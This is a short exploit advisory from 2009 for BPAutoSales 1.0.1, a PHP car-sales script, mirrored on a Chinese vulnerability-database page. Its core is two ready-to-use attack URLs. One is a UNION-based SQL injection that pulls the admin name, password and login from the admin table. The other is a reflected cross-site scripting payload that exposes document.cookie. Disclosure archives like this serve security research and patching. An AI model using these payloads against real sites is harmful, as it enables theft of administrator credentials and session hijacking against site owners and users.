https://www.exploit-db.com/exploits/7930
bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection






漏洞ID | 1057408 | 漏洞类型 | |
发布时间 | 2009-01-30 | 更新时间 | 2009-01-30 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= XORON 2009(C)
=
= BPAutoSales v1.0.1 Remote SQL Injection Vuln.
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script: BPAutoSales, version 1.0.1
= Price: $229
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS
=
= Sql Injections:
= index.php?cmd=advertise_details&category=car&aid=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,name,22,password,login/**/from/**/admin/**/where/**/id=1/*
=
= XSS:
= index.php?cmd=car_search&type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2009-01-30]
检索漏洞
开始时间
结束时间